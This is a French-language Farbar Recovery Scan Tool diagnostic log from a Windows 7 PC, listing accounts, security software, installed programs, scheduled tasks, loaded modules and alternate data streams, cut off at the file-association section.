Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x86) Version: 01-03-2017 01 Exécuté par nours52 (03-03-2017 22:39:45) Exécuté depuis C:\Users\nours52\Downloads Microsoft Windows 7 Édition Familiale Premium Service Pack 1 (X86) (2014-12-04 12:04:52) Mode d'amorçage: Normal ========================================================== ==================== Comptes: ============================= Administrateur (S-1-5-21-1281696408-34496212-1937324486-500 - Administrator - Disabled) HomeGroupUser$ (S-1-5-21-1281696408-34496212-1937324486-1006 - Limited - Enabled) Invité (S-1-5-21-1281696408-34496212-1937324486-501 - Limited - Disabled) nours52 (S-1-5-21-1281696408-34496212-1937324486-1001 - Administrator - Enabled) => C:\Users\nours52 ==================== Centre de sécurité ======================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.) AV: Microsoft Security Essentials (Disabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1} AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF} AS: Microsoft Security Essentials (Disabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402} ==================== Programmes installés ====================== (Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.) 7-Zip 15.14 (HKLM\...\7-Zip) (Version: 15.14 - Igor Pavlov) 7-Zip 16.04 (HKLM\...\{23170F69-40C1-2701-1604-000001000000}) (Version: 16.04.00.0 - Igor Pavlov) Adblock Plus pour IE (32-bits) (HKLM\...\{0B19C9C6-85BA-4CFF-AB4B-D77EEB19E263}) (Version: 99.9 - Eyeo GmbH) Adobe Acrobat Reader DC - Français (HKLM\...\{AC76BA86-7AD7-1036-7B44-AC0F074E4100}) (Version: 15.023.20070 - Adobe Systems Incorporated) Adobe AIR (HKLM\...\Adobe AIR) (Version: 24.0.0.180 - Adobe Systems Incorporated) Adobe Flash Player 24 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 24.0.0.221 - Adobe Systems Incorporated) Adobe Flash Player 24 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 24.0.0.221 - Adobe Systems Incorporated) AMD Catalyst Install Manager (HKLM\...\{17A7AA54-B23B-22B7-CDD5-C51122056415}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.) ASUS VGA Driver (Version: 3.0.0.1 - Nom de votre société) Hidden ATI AVIVO Codecs (Version: 11.6.0.10524 - ATI Technologies Inc.) Hidden Avast Antivirus Gratuit (HKLM\...\Avast Antivirus) (Version: 17.1.2286 - AVAST Software) CameraHelperMsi (Version: 13.51.815.0 - Logitech) Hidden CardRecovery 6.00 (HKLM\...\{88D68A69-D247-466B-90DD-575F6BE16230}_is1) (Version: - WinRecovery Software) CCleaner (HKLM\...\CCleaner) (Version: 5.27 - Piriform) Chromium (HKU\S-1-5-21-1281696408-34496212-1937324486-1001\...\Chromium) (Version: 44.0.2386.0 - Chromium) Classic Menu for Office 2010 and 2013 (HKLM\...\{90710DE9-45E4-4F31-AA8F-86A4C96FA386}) (Version: 8.05 - Detong Technology Ltd.) D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden Driver Booster 4.2 (HKLM\...\Driver Booster_is1) (Version: 4.2.0 - IObit) DriversCloud.com (HKLM\...\{8D0A1BCC-F577-44D5-A0C5-C67B12557840}) (Version: 8.0.3.1 - Cybelsoft) EaseUS Data Recovery Wizard 8.5 (HKLM\...\EaseUS Data Recovery Wizard 8.5_is1) (Version: - EaseUS) EPSON BX305 Plus Series Printer Uninstall (HKLM\...\EPSON BX305 Plus Series) (Version: - SEIKO EPSON Corporation) Epson Easy Photo Print 2 (HKLM\...\{FFF841F3-9A15-4F61-BD16-C19F132E5A27}) (Version: 2.3.0.0 - SEIKO EPSON CORPORATION) Epson Easy Photo Print Plug-in for PMB(Picture Motion Browser) (HKLM\...\{B2D55EB8-32C5-4B43-9006-9E97DECBA178}) (Version: 1.00.0000 - SEIKO EPSON CORPORATION2) Epson FAX Utility (HKLM\...\{0CBE6C93-CB2E-4378-91EE-12BE6D4E2E4A}) (Version: 1.20.00 - SEIKO EPSON CORPORATION) Epson PC-FAX Driver (HKLM\...\EPSON PC-FAX Driver 2) (Version: - ) EPSON Scan (HKLM\...\EPSON Scanner) (Version: - Seiko Epson Corporation) EpsonNet Print (HKLM\...\{3E31400D-274E-4647-916C-2CACC3741799}) (Version: 2.4j - SEIKO EPSON CORPORATION) erLT (Version: 1.20.138.34 - Logitech, Inc.) Hidden EVEREST Home Edition v2.20 (HKLM\...\EVEREST Home Edition_is1) (Version: 2.20 - Lavalys Inc) FileHippo App Manager (HKLM\...\FileHippo.com) (Version: - FileHippo.com) Google Chrome (HKLM\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.) Google Update Helper (Version: 1.3.32.7 - Google Inc.) Hidden Guide d'utilisation EPSON BX305 Plus Series (HKLM\...\EPSON BX305 Plus Series Useg) (Version: - ) Guide réseau EPSON BX305 Plus Series (HKLM\...\EPSON BX305 Plus Series Netg) (Version: - ) HeroSpeedCMS (HKLM\...\HeroSpeedCMS4.1.0.1) (Version: 4.1.0.1 - HeroSpeed) IncrediMail (Version: 6.3.9.5274 - IncrediMail) Hidden IncrediMail 2.0 (HKLM\...\IncrediMail) (Version: 6.3.9.5274 - IncrediMail Ltd.) Java 8 Update 101 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation) Java 8 Update 121 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F32180121F0}) (Version: 8.0.1210.13 - Oracle Corporation) Java 8 Update 91 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83218091F0}) (Version: 8.0.910.14 - Oracle Corporation) Junk Mail filter update (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden K-Lite Codec Pack 12.2.5 Full (HKLM\...\KLiteCodecPack_is1) (Version: 12.2.5 - KLCP) LINE (HKU\S-1-5-21-1281696408-34496212-1937324486-1001\...\LINE) (Version: 5.0.0.1380 - LINE Corporation) Logitech Webcam Software (HKLM\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.51 - Logitech Inc.) Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes) Microsoft .NET Framework 4.5.2 (Français) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1036) (Version: 4.5.51209 - Microsoft Corporation) Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-1281696408-34496212-1937324486-1001\...\OneDriveSetup.exe) (Version: 17.0.4035.0328 - Microsoft Corporation) Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation) Mozilla Firefox 51.0.1 (x86 fr) (HKLM\...\Mozilla Firefox 51.0.1 (x86 fr)) (Version: 51.0.1 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 51.0.1.6234 - Mozilla) MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) Netview Pad OCX (HKLM\...\Netview Pad OCX) (Version: 2.0.0.1 - ) Netview_X OCX (HKLM\...\Netview_X OCX) (Version: 2.0.0.1 - ) NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.10.57.35 - NVIDIA Corporation) NVIDIA ForceWare Network Access Manager (HKLM\...\{7CFA46E3-CC2F-4355-82AE-6012DC3633FD}) (Version: 1.00.7325.0 - NVIDIA Corporation) NVIDIA MediaShield (HKLM\...\{CC452A50-5C87-4A1F-B295-445C3C69BF7D}) (Version: 11.1.0.43 - NVIDIA Corporation) PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.2.2 - pdfforge) PhotoFiltre 7 (HKU\S-1-5-21-1281696408-34496212-1937324486-1001\...\PhotoFiltre 7) (Version: - ) PlaysTV (HKLM\...\PlaysTV) (Version: 1.12.5-r114891-release - Plays.tv, LLC) Rapport (Version: 3.5.1609.76 - Trusteer) Hidden Realtek Card Reader (HKLM\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10586.31225 - Realtek Semiconduct Corp.) Realtek Ethernet Controller Driver (HKLM\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.90.826.2014 - Realtek) Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.) Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform) SafeZone Stable 3.55.2393.527 (Version: 3.55.2393.527 - Avast Software) Hidden Samsung Kies (HKLM\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.3.14044_17 - Samsung Electronics Co., Ltd.) Samsung Kies (Version: 2.6.3.14044_17 - Samsung Electronics Co., Ltd.) Hidden Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.55.0 - Samsung Electronics Co., Ltd.) Samsung_MonSetup (HKLM\...\{8EA79DBF-D637-448A-89D6-410A087A4493}) (Version: 1.00.0000 - Samsung) Save Your Tapes (Version: 7.05.000 - Avanquest) Hidden Secret Disk (HKLM\...\sede) (Version: 3.14 - PrivacyRoot.com) Skype Click to Call (HKLM\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation) Skype™ 7.32 (HKLM\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.32.104 - Skype Technologies S.A.) Smart Switch (HKLM\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.0.15113.12 - Samsung Electronics Co., Ltd.) Smart Switch (Version: 4.0.15113.12 - Samsung Electronics Co., Ltd.) Hidden Speccy (HKLM\...\Speccy) (Version: 1.29 - Piriform) Stellar Phoenix Photo Recovery (HKLM\...\Stellar Phoenix Photo Recovery_is1) (Version: 6.0.0.1 - Stellar Information Technology Pvt Ltd.) TeamViewer 7 (HKLM\...\TeamViewer 7) (Version: 7.0.13852 - TeamViewer) TP-LINK Archer T4U Driver (HKLM\...\{58F414FE-74CC-42A0-9D86-A089849C510A}) (Version: 1.3.1 - TP-LINK) TP-LINK Wireless Configuration Utility (HKLM\...\{319D91C6-3D44-436C-9F79-36C0D22372DC}) (Version: 1.3.1 - TP-LINK) Trusteer Sécurité des points d'accès (HKLM\...\Rapport_msi) (Version: 3.5.1609.76 - Trusteer) TuneUp Utilities 2014 (fr-FR) (Version: 14.0.1000.353 - TuneUp Software) Hidden Ultracopier 1.2.3.1 (HKLM\...\Ultracopier) (Version: 1.2.3.1 - Ultracopier) Visionneuse Microsoft PowerPoint (HKLM\...\{95140000-00AF-040C-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation) Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.) Visual Studio C++ 10.0 Runtime (HKLM\...\{4412F224-3849-4461-A3E9-DEEF8D252790}) (Version: 10.0.0 - TomTom International B.V.) VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN) VoipConnect (HKLM\...\VoipConnect_is1) (Version: 4.14 build 760 - Finarea S.A. Switzerland) WD Drive Utilities (HKLM\...\{22662b08-91e0-4540-bb98-c96f32e09417}) (Version: 1.3.0.18 - Western Digital Technologies, Inc.) WD Drive Utilities (Version: 1.3.0.18 - Western Digital Technologies, Inc.) Hidden WD Quick View (HKLM\...\{2EF5C39F-371A-4125-ACE6-4E22CEAF894E}) (Version: 2.4.14.13 - Western Digital Technologies, Inc.) WD Security (HKLM\...\{429a42d7-4c55-44d4-b38a-5872a0d70495}) (Version: 1.3.0.18 - Western Digital Technologies, Inc.) WD Security (Version: 1.3.0.18 - Western Digital Technologies, Inc.) Hidden WD SmartWare (HKLM\...\{21BEE5F4-CEAC-4900-8B63-0F78AB16D98A}) (Version: 2.4.14.13 - Western Digital Technologies, Inc.) WD SmartWare Installer (HKLM\...\{e72369b3-306a-4d10-a766-3433a65e8dc2}) (Version: 2.4.14.13 - Western Digital Technologies, Inc.) Windows Live (HKLM\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation) ==================== Personnalisé CLSID (Avec liste blanche): ========================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{00b7e0ab-817a-44ad-a04b-d1148d524136}\InprocServer32 -> C:\Users\nours52\AppData\Roaming\Microsoft\MSXML2\msxml4.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{68D44A27-FFB6-4B89-A3E5-7B0E50A7AB33}\InprocServer32 -> C:\Program Files\Ultracopier\PluginLoader\catchcopy-v0002\catchcopy32.dll () CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{7c6e29bc-8b8b-4c3d-859e-af6cd158be0f}\InprocServer32 -> C:\Users\nours52\AppData\Roaming\Microsoft\MSXML2\msxml4.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{88d969c0-f192-11d4-a65f-0040963251e5}\InprocServer32 -> C:\Users\nours52\AppData\Roaming\Microsoft\MSXML2\msxml4.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{88d969c1-f192-11d4-a65f-0040963251e5}\InprocServer32 -> C:\Users\nours52\AppData\Roaming\Microsoft\MSXML2\msxml4.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{88d969c2-f192-11d4-a65f-0040963251e5}\InprocServer32 -> C:\Users\nours52\AppData\Roaming\Microsoft\MSXML2\msxml4.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{88d969c3-f192-11d4-a65f-0040963251e5}\InprocServer32 -> C:\Users\nours52\AppData\Roaming\Microsoft\MSXML2\msxml4.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{88d969c4-f192-11d4-a65f-0040963251e5}\InprocServer32 -> C:\Users\nours52\AppData\Roaming\Microsoft\MSXML2\msxml4.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{88d969c5-f192-11d4-a65f-0040963251e5}\InprocServer32 -> C:\Users\nours52\AppData\Roaming\Microsoft\MSXML2\msxml4.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{88d969c6-f192-11d4-a65f-0040963251e5}\InprocServer32 -> C:\Users\nours52\AppData\Roaming\Microsoft\MSXML2\msxml4.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{88d969c8-f192-11d4-a65f-0040963251e5}\InprocServer32 -> C:\Users\nours52\AppData\Roaming\Microsoft\MSXML2\msxml4.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{88d969c9-f192-11d4-a65f-0040963251e5}\InprocServer32 -> C:\Users\nours52\AppData\Roaming\Microsoft\MSXML2\msxml4.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{88d969ca-f192-11d4-a65f-0040963251e5}\InprocServer32 -> C:\Users\nours52\AppData\Roaming\Microsoft\MSXML2\msxml4.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{88d969d6-f192-11d4-a65f-0040963251e5}\InprocServer32 -> C:\Users\nours52\AppData\Roaming\Microsoft\MSXML2\msxml4.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\nours52\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\SkyDriveShell.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\nours52\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\SkyDriveShell.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\nours52\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\SkyDriveShell.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\nours52\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\SkyDriveShell.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1281696408-34496212-1937324486-1001_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\nours52\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\FileSyncApi.dll (Microsoft Corporation) ==================== Tâches planifiées (Avec liste blanche) ============= (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) Task: {10C0F7FE-C74B-4B14-B202-75C448EDDB2B} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated) Task: {3407796D-DC65-4DC3-9E53-52250135066D} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2017-02-25] (Adobe Systems Incorporated) Task: {3A48CA43-CD00-4B54-8C8F-E213A929C2DE} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2017-02-16] (Google Inc.) Task: {3AD5F85E-FB6E-4F11-B843-5ED9DE9F64E2} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2017-02-16] (Google Inc.) Task: {3BF45D5D-C805-491A-93F9-C20D642E5025} - System32\Tasks\Driver Booster Scheduler => C:\Program Files\IObit\Driver Booster\4.2.0\Scheduler.exe [2016-12-14] (IObit) Task: {5859DAEE-07FA-4B56-A00B-89DC6B14DF92} - System32\Tasks\klcp_update => C:\Program Files\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2016-07-07] () Task: {5EFE89E3-AA7A-44D5-B93F-7A1EB3EA29B7} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-02-08] (Piriform Ltd) Task: {67060B48-1062-419C-A03D-D180D1990268} - System32\Tasks\{06EC4DFD-5BD9-4E0A-9275-D0664F402A75} => pcalua.exe -a "C:\Program Files\InstallShield Installation Information\{58F414FE-74CC-42A0-9D86-A089849C510A}\setup.exe" -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TP-LINK" -c -runfromtemp -removeonly DriverOnly Task: {75175B07-14A8-403B-8DF8-2A0804B6D706} - System32\Tasks\ASC10_SkipUac_nours52 => C:\Program Files\IObit\Advanced SystemCare\ASC.exe Task: {B6EA6237-8746-4B10-9849-8AB9169F2A2A} - System32\Tasks\Driver Booster SkipUAC (nours52) => C:\Program Files\IObit\Driver Booster\4.2.0\DriverBooster.exe [2017-01-10] (IObit) Task: {C74F74A4-E314-4BE4-B0D3-F00844DCEE48} - System32\Tasks\{96774CA6-DB67-4897-89A2-2BA11D11F4DC} => pcalua.exe -a "C:\Program Files\Windows Live\Mail\wlmail.exe" -d "C:\Program Files\Windows Live\Mail\" Task: {C8D34491-976B-413C-8ED3-DAE46024D5DB} - System32\Tasks\SafeZone scheduled Autoupdate 1468602328 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2017-02-03] (Avast Software) Task: {D441B9D7-6598-45C7-A037-8B5725BAEBAA} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-02-14] (AVAST Software) Task: {D8978F4A-C736-41D9-8F4E-F9B0E367AE5C} - System32\Tasks\Uninstaller_Install_nours52 => C:\Program Files\IObit\Advanced SystemCare\ActionCenterDownloader.exe Task: {E35307D1-7A87-4857-9844-6E30EDCECD79} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2017-02-14] (AVAST Software) Task: {EE1D6D02-5649-4A91-A43D-214864631803} - System32\Tasks\ASC10_PerformanceMonitor => C:\Program Files\IObit\Advanced SystemCare\Monitor.exe (Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe ==================== Raccourcis ============================= (Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.) ==================== Modules chargés (Avec liste blanche) ============== 2017-02-14 07:26 - 2017-02-14 07:26 - 00170216 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll 2017-03-02 07:13 - 2017-03-02 07:13 - 05989584 _____ () C:\Program Files\AVAST Software\Avast\defs\17030200\algo.dll 2017-02-14 07:26 - 2017-02-14 07:26 - 00655056 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll 2017-03-03 22:11 - 2017-03-03 22:11 - 05877248 _____ () C:\Program Files\AVAST Software\Avast\defs\17030303\algo.dll 2015-11-24 21:48 - 2015-11-24 21:48 - 00028160 _____ () C:\Program Files\Raptr Inc\PlaysTV\servicemanager.pyd 2015-11-24 21:46 - 2015-11-24 21:46 - 00110592 _____ () C:\Program Files\Raptr Inc\PlaysTV\pywintypes26.dll 2015-11-24 21:48 - 2015-11-24 21:48 - 00041472 _____ () C:\Program Files\Raptr Inc\PlaysTV\win32service.pyd 2015-11-24 21:48 - 2015-11-24 21:48 - 00096256 _____ () C:\Program Files\Raptr Inc\PlaysTV\win32api.pyd 2015-11-24 21:43 - 2015-11-24 21:43 - 00356864 _____ () C:\Program Files\Raptr Inc\PlaysTV\_hashlib.pyd 2015-11-24 21:48 - 2015-11-24 21:48 - 00017920 _____ () C:\Program Files\Raptr Inc\PlaysTV\win32event.pyd 2015-11-24 21:48 - 2015-11-24 21:48 - 00019968 _____ () C:\Program Files\Raptr Inc\PlaysTV\win32evtlog.pyd 2015-11-24 21:48 - 2015-11-24 21:48 - 00036352 _____ () C:\Program Files\Raptr Inc\PlaysTV\win32process.pyd 2015-11-24 21:43 - 2015-11-24 21:43 - 00043008 _____ () C:\Program Files\Raptr Inc\PlaysTV\_socket.pyd 2015-11-24 21:43 - 2015-11-24 21:43 - 00805376 _____ () C:\Program Files\Raptr Inc\PlaysTV\_ssl.pyd 2015-11-24 21:43 - 2015-11-24 21:43 - 00087040 _____ () C:\Program Files\Raptr Inc\PlaysTV\_ctypes.pyd 2015-11-24 21:46 - 2015-11-24 21:46 - 00354304 _____ () C:\Program Files\Raptr Inc\PlaysTV\pythoncom26.dll 2015-11-24 21:48 - 2015-11-24 21:48 - 00167936 _____ () C:\Program Files\Raptr Inc\PlaysTV\win32gui.pyd 2015-11-24 21:47 - 2015-11-24 21:47 - 01980928 _____ () C:\Program Files\Raptr Inc\PlaysTV\PyQt5.QtGui.pyd 2015-12-07 21:57 - 2015-12-07 21:57 - 00077824 _____ () C:\Program Files\Raptr Inc\PlaysTV\sip.pyd 2015-11-24 21:47 - 2015-11-24 21:47 - 01862144 _____ () C:\Program Files\Raptr Inc\PlaysTV\PyQt5.QtCore.pyd 2015-11-24 21:47 - 2015-11-24 21:47 - 00516608 _____ () C:\Program Files\Raptr Inc\PlaysTV\PyQt5.QtNetwork.pyd 2015-11-24 21:47 - 2015-11-24 21:47 - 04060160 _____ () C:\Program Files\Raptr Inc\PlaysTV\PyQt5.QtWidgets.pyd 2015-11-24 21:43 - 2015-11-24 21:43 - 00010240 _____ () C:\Program Files\Raptr Inc\PlaysTV\select.pyd 2015-12-04 11:44 - 2015-03-19 08:41 - 00048856 _____ () C:\Windows\runSW.exe 2014-12-13 13:45 - 2010-01-21 01:52 - 00370792 _____ () C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcAppFlt.exe 2014-12-13 13:45 - 2010-01-21 01:51 - 00062568 _____ () C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nv_common.dll 2014-12-13 13:45 - 2010-01-21 01:52 - 00565864 _____ () C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\SpecialCase.dll 2014-12-13 13:45 - 2010-01-21 01:52 - 00167528 _____ () C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcIp.exe 2016-07-15 18:01 - 2016-07-15 18:01 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll 2017-02-14 07:25 - 2017-02-14 07:25 - 00289328 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll 2017-02-08 03:52 - 2017-02-08 03:52 - 00073728 _____ () C:\Program Files\CCleaner\lang\lang-1036.dll 2015-06-02 14:51 - 2015-06-02 14:51 - 00545792 _____ () C:\Program Files\Trusteer\Rapport\bin\js32.dll 2016-01-23 20:36 - 2015-11-16 15:18 - 00033128 _____ () C:\Program Files\IncrediMail\Bin\IMHttpComm.dll 2016-01-23 20:36 - 2015-11-16 15:18 - 00072104 _____ () C:\Program Files\IncrediMail\Bin\wlessfp1.dll 2016-01-23 20:36 - 2015-11-16 15:18 - 00268712 _____ () C:\Program Files\IncrediMail\Bin\ImLookExU.dll 2016-01-23 20:36 - 2015-11-16 15:18 - 00108888 _____ () C:\Program Files\IncrediMail\Bin\pmc.dll 2016-01-23 20:36 - 2015-11-16 15:18 - 00133544 _____ () C:\Program Files\IncrediMail\Bin\ImComUtlU.dll 2016-01-23 20:36 - 2015-11-16 15:18 - 00080296 _____ () C:\Program Files\IncrediMail\bin\ImAppRU.dll 2017-02-22 11:25 - 2017-02-22 11:25 - 04270544 _____ () C:\Users\nours52\AppData\Local\LINE\bin\5.0.0.1380\ampkit_windows.dll 2017-02-22 11:25 - 2017-02-22 11:25 - 00123344 _____ () C:\Users\nours52\AppData\Local\LINE\bin\5.0.0.1380\PlayerHelper.dll 2017-02-14 07:25 - 2017-02-14 07:25 - 00134920 _____ () c:\Program Files\AVAST Software\Avast\vaarclient.dll 2017-01-22 18:50 - 2017-01-22 18:50 - 00054392 _____ () C:\Program Files\Trusteer\Rapport\bin\RapportTanzanUtil_2015.dll ==================== Alternate Data Streams (Avec liste blanche) ========= (Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.) AlternateDataStreams: C:\Windows\system32\Drivers\uzmvyreu.sys:changelist [1802] AlternateDataStreams: C:\ProgramData\TEMP:728B799F [128] AlternateDataStreams: C:\ProgramData\TEMP:F0D7EE30 [284] ==================== Mode sans échec (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.) ==================== Association (Avec liste blanche) 